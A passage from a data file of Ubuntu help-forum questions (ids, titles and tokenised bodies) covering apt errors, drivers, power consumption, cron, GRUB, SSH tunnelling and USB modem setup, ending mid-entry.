414912	encountered a section with no package : header ( 32bit )	i am haveing an error when trying to do any for of cli updates . i keep getting this error : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_nilarimogard_webupd8_ubuntu_dists_saucy_main_i18n_translation-en % 5fus i ca n't get anything to update at all . when i run sudo apt-get update it will start runing like normal the i get that error . if i run sudo apt-get upgrade it errors right away . m*** @ m***-ubutnu : /etc/apt $ sudo apt-get upgrade [ sudo ] password for m*** : reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_saucy-backports_main_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened . i am also getting a popup with e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_saucy-backports_main_i18n_translation-en % % 5fus , e : the package lists or status file could not be parsed or opened . any advice would be great .
414913	audio & video playback broken	from one day to the next my playback system seems to be broken . i 'm not talking about delay ; or choppy playback : it sounds like a broken cd ! no matter if i stream youtube , or music from my hard drive . i use ubuntu 12.04. and have recently updated . i do n't know where to look for an error , any ideas ? thanks very much ! q .
414914	13.10 suspend , keyboard doesnt type in logon box , but mouse works	13.10 suspend , keyboard doesnt type in logon box , but mouse works . logon screen is showing but cant type password . mouse is working well . my laptop is sony vaio vgn-cs16g
414915	will upgrading to 13.10 screw up my graphics drivers , and if so what can i do before upgrading to avert it ?	i 'm on ubuntu 13.04 64-bit , with the following specs : cpu : amd athlon ii x4 640 gpu : club3d hd 5770 1gb ram : 4gb mobo : gb ga-870a-usb3 i 'm currently using the regular fglrx propietary driver , but when i upgrade to 13.10 will i experience any graphics problems , and if so , how could i avert them before installing ?
414916	ear candy problem	i installed ear candy on my ubuntu 12.04 because i had a problem with skype . i could n't even answer calls or something because of some audio problems , and i read somewhere that ear candy could solve my problem . now i do n't have any sound , nothing . i tried to remove ear candy , but i still have the same problem . i also have other problems with ubuntu , not related to ear candy , which is making me feel frustrated by the lack of ubuntu official support , something like the online support that microsoft has , and this is making me think about going back to windows , which i do n't want to do . please help .
414918	changing my default internet connection to the usb dongle	i am a newbie to ubuntu and would like to change my default connection to my usb dongle ( mobile broadband ) instead of the wifi interface . currently i am unable to install applications using the ubuntu software center as it assumes i have no internet connection since i 'm connected using the usb dongle instead of the wifi link i used when installing ubuntu . any assistance will be greatly appreciated . thanks
414919	ubuntu ns-3 openflow module installation	i only get install this module in ubuntu 13.10 with boost library version 1.54 : sudo apt-get install libxml2-dev libxslt-dev sudo apt-get install libboost1.54-all-dev so , in $ ns3_path/ns3/openflow : ./waf clean & & ./waf configure & & ./waf build then , in $ ns3_path/ns3/ ./waf configure -- enable-examples -- enable-tests -- with-openflow= $ ns3_path/ns3/openflow/ do note that this is the correct step to include other modules you may want to use . not forget to include other modules ( e.g . : click , brite , etc . ) with -- with- [ module1 ] = ... -- with- [ module2 ] = ... , and so on . otherwise , only the additional openflow module will be enabled . to actually build it , run : ./waf build
414920	realtek hd audio driver mic noise supression	how i get this option in ubuntu ? because it stop the annoying static noise . i 'm using razer carcharias 's mic ( 2010 model ) . in windows with this options there is n't any static noise .
414923	ubuntu 13.10 : improving power consumption ( thinkpad t530 )	edit : after reading @ jandry 's reply , i decided to give another distro with a different window manager a try to see if it is really unity 's fault . i installed ubuntugnome , and to my utmost surprise the battery life on a fresh vanilla installation , was about 8-10 hours which is even better than windoze 7 ! it 's a shame that unity is the culprit here . i 'm running ubuntu 13.10 on a thinkpad t530 machine . ( core i7 , 9-cell battery , 16gb ram , nvidia + intel vga , 15 '' lcd , ... ) . since i do n't play games , i have disabled the nvidia card from bios so practically the system has only one vga card , the intel one . i have installed and enabled laptop-mode-tools . when running on battery , the battery provides about 3 hours of charge . the same machine , running windoze 7 , had about 7-10 hours of battery life . i understand that comparing battery consumption on windoze and linux does n't make sense as it is deeply dependent on the quality of the drivers available on either operating system . however , still , 3 hours of charge is pretty much ridiculous for a 9-cell battery . i installed powertop to find a clue . here 's a full output after logging in and before running any applications : the battery reports a discharge rate of 23.5 w the estimated remaining time is 2 hours , 18 minutes summary : 341.5 wakeups/second , 6.5 gpu ops/seconds , 0.0 vfs ops/sec and 6.9 % cpu use power est . usage events/s category description 3.56 w 2729 rpm device laptop fan 3.15 w 1.1 % device display backlight 1.58 w 0.0 % device display backlight 383 mw 0.3 pkts/s device network interface : wlan0 ( iwlwifi ) 45.3 mw 11.6 ms/s 54.5 process compiz 30.3 mw 14.9 ms/s 23.7 process /usr/lib/unity/unity-panel-service 20.1 mw 9.7 ms/s 19.6 process indicator-multiload 13.6 mw 6.8 ms/s 9.1 process /usr/lib/x86_64-linux-gnu/hud/hud-service 8.11 mw 3.3 ms/s 21.9 process /usr/lib/x86_64-linux-gnu/indicator-application-service 7.84 mw 3.7 ms/s 9.7 process chromium-browser -- no-startup-window 7.03 mw 419.1 µs/s 15.0 process syndaemon -i 1.0 -t -k -r 6.18 mw 650.0 µs/s 59.0 process [ rcu_sched ] 5.79 mw 2.9 ms/s 3.5 process /usr/bin/x -core :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch 5.73 mw 1.3 ms/s 39.9 interrupt [ 46 ] i915 4.69 mw 1.5 ms/s 21.5 process [ irq/45-iwlwifi ] 4.17 mw 2.2 ms/s 0.00 process dbus-daemon -- fork -- session -- address=unix : abstract=/tmp/dbus-s5l9uijprw 3.32 mw 0.9 ms/s 2.6 process gnome-terminal 2.43 mw 1.3 ms/s 0.15 process powertop 2.05 mw 0.8 ms/s 6.9 process upstart-dbus-bridge -- daemon -- session -- user -- bus-name session 2.01 mw 0.9 ms/s 3.5 kwork iwl_bg_run_time_calib_work 1.53 mw 372.9 µs/s 9.8 timer hrtimer_wakeup 1.46 mw 679.7 µs/s 2.0 process /usr/bin/python3 /usr/bin/indicator-cpufreq 1.42 mw 425.4 µs/s 7.3 timer tick_sched_timer 973 µw 116.3 µs/s 9.0 kwork ieee80211_iface_work 864 µw 307.7 µs/s 3.3 process stardict 844 µw 99.0 µs/s 7.8 interrupt [ 45 ] iwlwifi 629 µw 263.2 µs/s 1.5 process /usr/lib/x86_64-linux-gnu/indicator-power/indicator-power-service 478 µw 252.0 µs/s 0.00 process [ kworker/u16:5 ] 475 µw 245.6 µs/s 0.10 kwork output_poll_execute 447 µw 233.2 µs/s 0.05 process [ rcuos/6 ] 418 µw 220.3 µs/s 0.00 process [ kworker/u16:7 ] 398 µw 205.0 µs/s 0.10 process [ rcuos/0 ] 384 µw 202.2 µs/s 0.00 process [ rcuos/4 ] 381 µw 200.9 µs/s 0.00 timer process_timeout 380 µw 195.9 µs/s 0.10 interrupt [ 7 ] sched ( softirq ) 373 µw 35.7 µs/s 3.6 kwork intel_unpin_work_fn 329 µw 173.2 µs/s 0.00 interrupt [ 1 ] timer ( softirq ) 303 µw 110.9 µs/s 1.1 process /usr/lib/upower/upowerd 256 µw 135.0 µs/s 0.00 process dbus-daemon -- system -- fork 251 µw 39.7 µs/s 2.1 kwork intel_fbc_work_fn 240 µw 102.3 µs/s 0.5 process networkmanager 230 µw 121.2 µs/s 0.00 process [ rcuos/2 ] 181 µw 95.3 µs/s 0.00 timer delayed_work_timer_fn 153 µw 72.0 µs/s 0.20 process /usr/sbin/irqbalance 149 µw 30.2 µs/s 1.1 interrupt [ 4 ] block ( softirq ) 140 µw 56.0 µs/s 0.4 process gnome-settings-daemon -r 134 µw 70.5 µs/s 0.00 interrupt [ 9 ] rcu ( softirq ) 126 µw 64.2 µs/s 0.05 process [ rcuos/3 ] also , all cpu cores are running at ~1200mhz and i have manually disabled all the services i do n't mind starting manually like postgresql or tor . as you can see the battery is discharging at ~24w/h which is outrageous . how can i improve the situation here ? what is the main culprit behind this awful discharge rate ? i ca n't understand the logic that how powertop is reporting that value . i have read a ton of post regarding power consumption but to no avail . tia ,
414924	unity reacts to shortcuts when gaming under wine ( diablo 2 ii lord of destruction )	i play diablo 2 lod and need to use the alt-key quite often . it does n't work ingame and if i press it 2 or 3 times the game minimizes and the unity search function comes up . how can i disable this behaviour ? i do n't know if this is what the guy was describing but in the guide i followed to install the game this was mentioned to change in winecfg for the games executable : '' graphics - > unselect `` allow the window manager to control the windows '' we do that to be able to press alt/shift and mouse buttons at the same time while playing . it 's a must-do for diablo `` source i do n't know if this is relevant because alt-key simply does n't work , in conjunction with the mouse or without .
414925	can not mount ipod touch to ubuntu due to lockdown errors	i sit before you with the common question of how to sync an ipod 5g or any idevice to ubuntu 13.10 . i have asked apple tech support many a time aswell as their online chat and it has yielded no info besides going to canonical which said that they can not help me either because i need to be a paying customer . so ... how do i do it ? i have tried ifuse and libimobiledevice-utils and it has yielded no results for those who wish to know the errors , they are , `` unhandled lockdown error ( -256 ) '' , `` unhandled lockdown error ( -3 ) '' , `` unhandled lockdown error ( -5 ) '' , `` unhandled lockdown error ( -6 ) '' etc . help please . thanks mo .
414927	wi-fi connection is too slow	with the recent updates of around 25th jan 2014 , after installing those updates my wi-fi connection has slowed down . but before the updates it worked perfectly . and the browser does not even load some of the web pages . any thing i did wrong or is anyone else facing the same problem ? i am using ubuntu 13.10
414928	wacom graphire4 ( model cte-440 ) on ubuntu 13.10 ?	i got ubuntu-13.10 just a few weeks ago , and i 'm enjoying the interface a lot . what i 'm trying to do is get this wacom tablet to work so i can start hand-drawing things with my computer . it is a graphire4 ( model cte-440 ) and i would like it if someone can give me some pointers on getting it to work . edit -- -- -- -- -- yesterday , i went into looking for answers for this question on my own and after tinkering with some things , i found that the tablet works easy by default . the only problem i still have is getting the two buttons and scroll wheel configured to do specific functions . what i want right now is to set the wheel to the keys that increase/decrease brush size in gimp ( the ' [ ' and ' ] ' keys ) . i would greatly appreciate it if someone could help .
414929	ubuntu 13.10 networkmanager `` dump inconsistency detected '' system freeze	i 'm running ubuntu 13.10 on asus n550jv laptop . my system gets frozen pretty randomly during the day . sometimes it 's possible to switch to terminal and then back to resolve it , other times it entirely hangs and i have to go through a reboot . please notice the line : feb 3 18:10:10 ido-n550jv networkmanager [ 883 ] : < warn > nl_recvmsgs ( ) error : ( -33 ) dump inconsistency detected , interrupted after which i logged out and back in by switching to terminal , and i could continue working . afterward , it seems this message appeared again in the logs but the system did not freeze , therefore i 'm not certain the few networkmanager logs before that are related . nl_recvmsgs ( ) error : ( -33 ) dump inconsistency detected , interrupted is the only suspicious syslog message that may be related to these hangs . feb 3 18:09:25 ido-n550jv networkmanager [ 883 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . feb 3 18:09:25 ido-n550jv networkmanager [ 883 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... feb 3 18:09:25 ido-n550jv networkmanager [ 883 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... feb 3 18:09:25 ido-n550jv networkmanager [ 883 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . feb 3 18:10:10 ido-n550jv networkmanager [ 883 ] : < warn > nl_recvmsgs ( ) error : ( -33 ) dump inconsistency detected , interrupted feb 3 18:10:41 ido-n550jv whoopsie [ 1105 ] : online feb 3 18:11:12 ido-n550jv dbus [ 479 ] : [ system ] activating service name='org.freedesktop.systemd1 ' ( using servicehelper ) feb 3 18:11:12 ido-n550jv dbus [ 479 ] : [ system ] successfully activated service 'org.freedesktop.systemd1' feb 3 18:11:12 ido-n550jv acpid : client 1190 [ 0:0 ] has disconnected feb 3 18:11:12 ido-n550jv acpid : client 1190 [ 0:0 ] has disconnected feb 3 18:11:12 ido-n550jv acpid : client connected from 1190 [ 0:0 ] feb 3 18:11:12 ido-n550jv acpid : 1 client rule loaded feb 3 18:11:12 ido-n550jv acpid : client connected from 1190 [ 0:0 ] feb 3 18:11:12 ido-n550jv acpid : 1 client rule loaded feb 3 18:11:13 ido-n550jv networkmanager [ 883 ] : < warn > nl_recvmsgs ( ) error : ( -33 ) dump inconsistency detected , interrupted it 's worth mentioning the graphics driver seem to work good ( 750m with 319.32 drivers ) and on the other partition i 'm running windows 8 without any trouble , i highly doubt it 's a hardware issue update : i can confirm the error above has nothing to do with the system freeze . in 14.04 ( nvidia 331 ) the error does not log but system freezes the same way , on the same hardware . the error log is clearly not what was bothering me , so this question remains open . have tried different gpu drivers , yadah-yadah . there 's a large open topic about this on launchpad : https : //bugs.launchpad.net/ubuntu/+source/xorg-server/+bug/1184451 personally , being unable to resolve this , i 've since abandoned ubuntu entirely . sorry , good luck to you all
414930	access webpage through ssh	i need to access the ieee xplore , but i do n't have right to download out of institute . i can login into the server of institute via ssh , so how can i access ieee xplore through institute server via ssh ? i have searched solutions , some one answer : ssh -l 8080 : localhost:80 user @ remoteserver and then he says : now , point your local browser to localhost:8080 . it should be forwarded to localhost:80 in the remote server . but i still do n't know how to configure my laptop , im using chrome . i appreciate your help very much !
414931	how disable programmatically notebook built-in keyboard before login screen	how can i disable a notebooks built-in keyboard - before the login screen . i have a non functioning built-in keyboard on my notebook . in it 's current state it types characters randomly . i am using an external keyboard , and would like to avoid problems logging in i searched and found some solutions , like scripts - but i need one that works before the login screen .
414932	is it possible to save the scrollback in gnome 's terminal ?	so i 've run this long , involved difficult test that has a huge amount of output . this time , some problem has cropped up and i need to search through the output . to do that , i have to save the thousands of lines of scrollback into a file . i 've tried to capture it with my mouse , but it gets very , very slow and sometimes my finger slips . i need the output . there is no obvious way . the answer , `` you should not be going there from here '' means that gnome terminal is fatally deficient . i sure hope that is not true . so , how do i capture the scrollback without scrolling through everything with the # 1 mouse button held down the entire time ? thanks in advance ! !
414933	disable gui and go to command line terminal	i am trying to temporarily disable the gui in ubuntu 12.04 lts . when i follow these instructions and type sudo stop lightdm it does disable to the gui , but all that is left is a black screen without a terminal . what i would like to be able to do is turn the gui off , run a script from the terminal , and then turn the gui back on .
414934	different text scaling factors for different displays ?	i just purchased a new laptop , which has a much higher dpi than my prior one did ; in fact , its resolution ( in a 14 '' form ) is roughly the same as that of my 23 '' second monitor . i 'd like the text on each display to be roughly equivalent . adjusting the window-manager-wide text scaling factor ( via e.g . gnome-tweak-tool ) yields either too-small text on the laptop screen , or too large text on the second monitor . is there any way to have different text scaling apply to different displays ? i suspect not , but i would very much like to avoid replacing my current ( perfectly good ) external monitor just to compensate for the dpi increase in the laptop .
414936	dual boot ubuntu on windows 7 not working	i just recently downloaded ubuntu linux , and then burned it to a dvd . i just installed it , and not when i go to boot it , it auto boots windows 7 , and does n't give me an option to dual boot it . what is wrong ? i have : windows 7 ubuntu 12.04 64 bit toshiba satellite installed via dvd why does it not give me the option for dual boot ?
414943	reading package lists ... error !	i 'm getting the following message on using apt-get commands . reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/dl.google.com_linux_chrome_deb_dists_stable_main_binary-amd64_packages e : the package lists or status file could not be parsed or opened . also i 'm unable to open my software center . it gets closed down unexpectedly .
414948	windows wo n't boot after 12.04 install on slave drive	i 'm still new to ubuntu . i added a slave drive to my desktop that has windows vista on master hd . installed ubuntu 12.04 on slave drive and now vista wo n't boot from master drive only on slave hd that has ubuntu . i had to change the priority of hard drive boot to slave drive that has ubuntu . when i try to boot from master i get this error message : error : no such device : 42b5645e-9e24-4551-bdfe-259699182345 grub rescue > ubuntu seems to work fine . can anyone please help me out ? -mo
414949	why the cron job did not fire on ubuntu 12.04 ?	here is the script sqlite_backup.sh under $ home/ : # ! /bin/bash now= $ ( date + % d ) echo `` welcome to sqlite backup script '' sqlite3 /var/www/db/nbhydb.sqlite3 < < eof .timeout 20000 .backup $ home/nbhydb_backup_ $ now.sqlite3 eof echo `` end of the script '' the script is tested by typing $ home/sqlite_backup.sh and there is a backup file created under $ home . here is the cron job ( crontab -e ) : # m h dom mon dow command 5 * * * * $ home/sqlite_backup.sh here is cron log under /var/log/syslog : feb 3 13:05:01 ibm-testbox cron [ 8961 ] : ( root ) cmd ( $ home/sqlite_backup.sh ) the command is scheduled to run at 5th minute of every hour . however there is no backup file generated by the cron job . what we have missed ? thanks . update : cron job is modified to save the the execution error : 5 * * * * $ home/sqlite_backup.sh > $ home/backup.log 2 > & 1 after execution , the log is : welcome to sqlite backup script end of the script there is no error at all in the log . however there is still no nbhydb_3_backup.sqlite3 found .
414950	how to see grub kernels in ubuntu without restarting	i want to set up my ubuntu server to boot from an older kernel since the current one causes problems . how do i see the list of entries in the grub menu so i know which one to set to grub_default ? without restarting . its a remote server and id rather not drive 30 kms to see a list .
414951	how to make terminal line into shortcut ?	i have to run something like python /usr/lib/app.py -- parameter1=/media/ -- parameter2=/media/ to start an graphic app every time . how do i make that into shortcut , script or whatever so i can start it as normal app by double clicking an icon . if i can dock it to the launcher , great ! : )
414953	black screen after ubuntu logo	i deleted all partitions and i installed ubuntu 12.04 lts . well , when i startup my pc , after the ubuntu 's logo , a black screen appears but i hear the log on sound . if i restart and connect other screen , the os starts sucessfully . any ideas ? thanks !
414954	graphical issues with 3.13.1 kernel on ubuntu 13.10 on mbp 9,1	i recently added an ubuntu 13.10 installation to my osx 10.9.1 and windows 8.1 dual-boot on a macbook pro 9,1 . it was hard to find documentation for installation on this model , as everyone seems to be using the retinas now . however , from what i was able to find , i settled on this method , which seemed to work alright : partition hdd in advance with osx disk utility install from normal x64 ubuntu iso install bootloader to ubuntu boot partition this results in an efi boot mode . everything was going smoothly , even wifi was working fine . however , a couple of issues stood out : i do n't think graphics are being accelerated . not sure how to check definitively , but i notice that notifyosd notifications are opaque , which is how i 've told in the past . the computer could not properly resume from sleep ( i got a blank screen w/ cursor ) . by googling # 2 , i found someone saying updating to kernel 3.13 rc6 had fixed the problem . the post was a bit out of date , so i searched and found that the latest version on that branch was 3.13.1 . so , i downloaded that and installed it as detailed here . http : //ubuntuguide.net/install-linux ... tu-13-10-13-04 after installing the update , i found the sleep issue to indeed be solved . however , a new problem , which i have had no luck in finding reference to anywhere , emerged : i am now experiencing graphical `` lag '' everywhere . to better explain : say i move my cursor quickly : a trail of cursor `` artifacts '' is left behind ; say i mouse over a button or menu item , or press select all : nothing initially appears to be highlighted , except just around the cursor . in both these situations , moving my cursor slowly over the area gradually fixes the problem , as if i were `` painting '' the correct image back onto the screen with it . there is also a degree of screen tearing when scrolling webpages . obviously not knowing what is selected and similar issues are not really usable in the long run . so , i need one of two things : - a solution to the graphical problem in 3.13.1 - a solution to the original sleep problem not involving the installation of 3.13.1 ( i can still access the previous kernel through grub and uninstall the new one ) i also would like to make sure that i can use accelerated graphics . one of the main things i will eventually be doing on this installation is game playing/testing , which is a primary reason i multibooted rather than virtualized ( vms always take a performance hit ) . from what i can gather , efi mode and nvidia 's drivers do n't go well together atm . is that the only way to accelerate on a mbp ? thanks for any help ! edit1 : with nothing else to go on , i 'm thinking of just switching to bios emulation mode and trying the nvidia drivers . problem is , i ca n't find the `` switching bios/efi mode '' instructions i 've bumped into on several occasions when i have n't been looking for them ( of course ... ) . i 'm going to keep looking for a bit , but i might just try using a +mac iso and reinstalling . hopefully that would n't have any repercussions on the actual multi-boot . the only instructions i found for the installation were for efi boot ...
414956	unable to uninstall comodo on 12.04 lts 32-bit system	i tried to uninstall comodo but it is showing the following errors : anurag @ ubuntu : ~ $ sudo apt-get -- purge remove cav-linux e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? anurag @ ubuntu : ~ $ what can i do about this ?
414960	why does matlab iso image get mounted as read-only ?	i have been trying to install matlab on ubuntu . the issue starts even prior to the installation , as mounting the .iso file results in the following error : mount : block device /home/marta/downloads/r2013a_unix.iso is write-protected , mounting read-only when typing blkid i get : /dev/loop1 : label= '' mathworks_r2013a '' type= '' iso9660 '' /dev/sda1 : uuid= '' cb61-a2f3 '' type= '' vfat '' /dev/sda2 : uuid= '' 3a6abc2f-f83c-4c52-84f9-f10cbae59ada '' type= '' ext4 '' /dev/sda3 : uuid= '' 27362882-2d21-47ea-a65a-27102e6dea1e '' type= '' swap '' so it is there , but all as read-only and hence i ca n't use it . how do i resolve the issue ?
414962	importerror : no module named unstable	i get the following error when i execute the gui.py script on my newly installed ubuntu 12.04 lts . please help as i have recently started using ubuntu , i am not too good at debugging yet . i get this error when i am trying to open the gui of an open source software revkit sushanttrivedi @ ubuntu : ~/project/revkit-1.3 $ ./tools/gui/gui.py traceback ( most recent call last ) : file `` ./tools/gui/gui.py '' , line 143 , in < module > w = mainwindow ( ) file `` ./tools/gui/gui.py '' , line 73 , in __init__ self.setuptools ( ) file `` ./tools/gui/gui.py '' , line 102 , in setuptools import items.unstable importerror : no module named unstable what exactly is this error ? is it because there is some background package missing ? thanks for the help .
414963	setting-up beetel bg64 3g usb modem in ubuntu 13.10 [ how-to ]	i have just bought a beetel bg64 usb modem . this modem is working fine on win 7 but not in ubuntu 13.10 ( saucy ) . i have tried a lot , but still not working.i have posted the output of lsusb & usb-devices necessarily . any suggestion will be helpful . thank you in advance . edit : what i did : without attaching the dongle i pressed ctrl+meta+t , then typed : mount /dev/sr and pressed tab . this gave me the only suggestion , mount /dev/sr0 again i attached the dongle , then did the same , and the output is : mount /dev/sr sr0 sr1 now i pulled out the dongle from my machine and did : lsusb and i got the result : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub < br > bus 002 device 003 : id 0d8c:0201 c-media electronics , inc. cm6501 < br > bus 002 device 002 : id 04f3:0212 elan microelectronics corp. laser mouse < br > bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub < br > then i connected it to the machine again and did the same , and got : lsusb bus 001 device 004 : id 2020:0002 < br > bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub < br > bus 002 device 003 : id 0d8c:0201 c-media electronics , inc. cm6501 < br > bus 002 device 002 : id 04f3:0212 elan microelectronics corp. laser mouse < br > bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub < br > < br > without connecting the dongle i did : usb-devices and got : t : bus=01 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=480 mxch= 9 < br > d : ver= 2.00 cls=09 ( hub ) sub=00 prot=00 mxps=64 # cfgs= 1 < br > p : vendor=1d6b prodid=0002 rev=03.11 < br > s : manufacturer=linux 3.11.0-15-generic ehci_hcd < br > s : product=ehci host controller < br > s : serialnumber=0000:00:02.1 < br > c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma < br > i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub < br > t : bus=02 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=12 mxch= 9 < br > d : ver= 1.10 cls=09 ( hub ) sub=00 prot=00 mxps=64 # cfgs= 1 < br > p : vendor=1d6b prodid=0001 rev=03.11 < br > s : manufacturer=linux 3.11.0-15-generic ohci_hcd < br > s : product=ohci pci host controller < br > s : serialnumber=0000:00:02.0 < br > c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma < br > i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub < br > t : bus=02 lev=01 prnt=01 port=00 cnt=01 dev # = 2 spd=1.5 mxch= 0 < br > d : ver= 1.10 cls=00 ( > ifc ) sub=00 prot=00 mxps= 8 # cfgs= 1 < br > p : vendor=04f3 prodid=0212 rev=23.24 < br > s : product=ps/2+usb mouse < br > c : # ifs= 1 cfg # = 1 atr=a0 mxpwr=100ma < br > i : if # = 0 alt= 0 # eps= 1 cls=03 ( hid ) sub=01 prot=02 driver=usbhid < br > t : bus=02 lev=01 prnt=01 port=06 cnt=02 dev # = 3 spd=12 mxch= 0 < br > d : ver= 1.10 cls=00 ( > ifc ) sub=00 prot=00 mxps= 8 # cfgs= 1 < br > p : vendor=0d8c prodid=0201 rev=00.10 < br > s : product=pnp audio device < br > c : # ifs= 3 cfg # = 1 atr=80 mxpwr=500ma < br > i : if # = 0 alt= 0 # eps= 1 cls=01 ( audio ) sub=01 prot=00 driver=snd-usb-audio < br > i : if # = 1 alt= 0 # eps= 0 cls=01 ( audio ) sub=02 prot=00 driver=snd-usb-audio < br > i : if # = 2 alt= 0 # eps= 0 cls=01 ( audio ) sub=02 prot=00 driver=snd-usb-audio < br > then i did the same after attaching it again , and got : usb-devices t : bus=01 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=480 mxch= 9 < br > d : ver= 2.00 cls=09 ( hub ) sub=00 prot=00 mxps=64 # cfgs= 1 < br > p : vendor=1d6b prodid=0002 rev=03.11 < br > s : manufacturer=linux 3.11.0-15-generic ehci_hcd < br > s : product=ehci host controller < br > s : serialnumber=0000:00:02.1 < br > c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma < br > i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub < br > t : bus=01 lev=01 prnt=01 port=01 cnt=01 dev # = 5 spd=480 mxch= 0 < br > d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 < br > p : vendor=2020 prodid=0002 rev=02.00 < br > s : manufacturer=network connect < br > s : product=mt6229 < br > s : serialnumber=192101021136100 < br > c : # ifs= 1 cfg # = 1 atr=80 mxpwr=500ma < br > i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage < br > t : bus=02 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=12 mxch= 9 < br > d : ver= 1.10 cls=09 ( hub ) sub=00 prot=00 mxps=64 # cfgs= 1 < br > p : vendor=1d6b prodid=0001 rev=03.11 < br > s : manufacturer=linux 3.11.0-15-generic ohci_hcd < br > s : product=ohci pci host controller < br > s : serialnumber=0000:00:02.0 < br > c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma < br > i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub < br > t : bus=02 lev=01 prnt=01 port=00 cnt=01 dev # = 2 spd=1.5 mxch= 0 < br > d : ver= 1.10 cls=00 ( > ifc ) sub=00 prot=00 mxps= 8 # cfgs= 1 < br > p : vendor=04f3 prodid=0212 rev=23.24 < br > s : product=ps/2+usb mouse < br > c : # ifs= 1 cfg # = 1 atr=a0 mxpwr=100ma < br > i : if # = 0 alt= 0 # eps= 1 cls=03 ( hid ) sub=01 prot=02 driver=usbhid < br > t : bus=02 lev=01 prnt=01 port=06 cnt=02 dev # = 3 spd=12 mxch= 0 < br > d : ver= 1.10 cls=00 ( > ifc ) sub=00 prot=00 mxps= 8 # cfgs= 1 < br > p : vendor=0d8c prodid=0201 rev=00.10 < br > s : product=pnp audio device < br > c : # ifs= 3 cfg # = 1 atr=80 mxpwr=500ma < br > i : if # = 0 alt= 0 # eps= 1 cls=01 ( audio ) sub=01 prot=00 driver=snd-usb-audio < br > i : if # = 1 alt= 0 # eps= 0 cls=01 ( audio ) sub=02 prot=00 driver=snd-usb-audio < br > i : if # = 2 alt= 0 # eps= 0 cls=01 ( audio ) sub=02 prot=00 driver=snd-usb-audio < br > then i did : sudo mount /dev/sr1 /cdrom/ got the output as : mount : block device /dev/sr1 is write-protected , mounting read-only finally doing : nautilus /cdrom/ i got no .tar.bz2 or .deb so that i could make it or directly install its driver . in my gesture my device is ( lsusb ) : bus 001 device 004 : id 2020:0002 and ( usb-devices ) , t : bus=01 lev=01 prnt=01 port=01 cnt=01 dev # = 5 spd=480 mxch= 0 < br > d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 < br > p : vendor=2020 prodid=0002 rev=02.00 < br > s : manufacturer=network connect < br > s : product=mt6229 < br > s : serialnumber=192101021136100 < br > c : # ifs= 1 cfg # = 1 atr=80 mxpwr=500ma < br > i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage < br > modem detail : beetel s/n : 110100371109632 imei : 911210201163014 made in china ubuntu 13.10 ( saucy ) gnome 3.8.4 ( ubuntu 2013-12-05 ) kernel 3.11.0-15-generic ( # 25-ubuntu smp thu jan 30 17:22:01 utc 2014 ) os type linux gcc version 4.8 ( x86_64-linux-gnu ) xorg version 1.14.5 ( 17 december 2013 10:06:15am ) more strangely this dongle does not show up my 2gb micro sd memory card . any help will be saviour for me . otherwise i would have to stick to windows 7 , since without an internet connection ubuntu can not even be upgraded . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - with the dongle attached i started booting ubuntu , did the following and got : appuraja @ appuraja-system-product-name : ~ $ dmesg | tail < br > [ 24.919630 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready < br > [ 26.631204 ] init : udev-fallback-graphics main process ( 1237 ) terminated with status 1 < br > [ 26.839371 ] nvidia 0000:05:00.0 : irq 44 for msi/msi-x < br > [ 27.340359 ] vboxdrv : found 2 processor cores. < br > [ 27.342598 ] vboxdrv : fasync=1 offmin=0x5c90e offmax=0x5c90e < br > [ 27.346034 ] vboxdrv : tsc mode is 'asynchronous ' , kernel timer mode is 'normal'. < br > [ 27.346040 ] vboxdrv : successfully loaded version 4.2.16_ubuntu ( interface 0x001a0005 ) . < br > [ 27.388335 ] vboxpci : iommu not found ( not registered ) < br > [ 45.088400 ] fat-fs ( sdb1 ) : volume was not properly unmounted . some data may be corrupt . please run fsck. < br > [ 70.090509 ] systemd-hostnamed [ 2508 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! < br > appuraja @ appuraja-system-product-name : ~ $ lsusb < br > bus 001 device 004 : id 2020:2000 < br > bus 001 device 003 : id 0781:556b sandisk corp. < br > bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub < br > bus 002 device 003 : id 0d8c:0201 c-media electronics , inc. cm6501 < br > bus 002 device 002 